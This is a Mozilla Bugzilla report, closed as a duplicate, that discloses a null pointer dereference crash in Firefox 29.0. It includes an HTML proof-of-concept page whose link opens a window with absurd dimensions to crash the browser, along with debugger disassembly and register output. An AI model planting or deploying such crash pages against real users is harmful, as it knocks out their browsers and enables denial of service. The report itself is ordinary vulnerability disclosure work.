Closed
Bug 1015111
Opened 10 years ago
Closed 10 years ago
Mozilla Firefox 29.0 - Null Pointer Dereference Vulnerability
Categories
(Firefox :: Untriaged, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 1011864
People
(Reporter: ameerassadi1, Unassigned)
Details
User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36
Steps to reproduce:
<html>
<title>Mozilla Firefox Null Pointer Dereference Vulnerability</title>
<pre>
Fun side of life!
<br>
Details:
Title: Mozilla Firefox Null Pointer Dereference Vulnerability
Version: Prior to 29.0
Discovered By: Ameer Assadi
###################################
Disassembly:
01694240 8bc2 mov eax,edx
01694242 d9e0 fchs
01694244 8b550c mov edx,dword ptr [ebp+0Ch]
01694247 d95c2418 fstp dword ptr [esp+18h]
0169424b 8b1a mov ebx,dword ptr [edx] ds:0023:00000000=????????
0169424d d9442418 fld dword ptr [esp+18h]
01694251 8d4c2420 lea ecx,[esp+20h]
01694255 d9c0 fld st(0)
01694257 51 push ecx
============================================
Output:
(e0.544): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07e1fd00 ebx=0994bf90 ecx=000001f8 edx=00000000 esi=000000a8 edi=00000000
eip=0169424b esp=0012c8f0 ebp=0012c940 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Mozilla Firefox\xul.dll -
xul!NS_NewLocalFile+0x2a49c:
0169424b 8b1a mov ebx,dword ptr [edx] ds:0023:00000000=????????
#######################################################################################
</pre>
<a href="javascript:_Launch_Website_In_Floating_Window_()"
onclick="window.open('about:blank','1','toolbar=yes,location=yes,directories=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=9999999999,height=9999999999');"
>Crash_Me</a>
<br><br>
I kill you again!
</html>
Actual results:
See the Exploit
Expected results:
See the Exploit
Updated•10 years ago
|
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•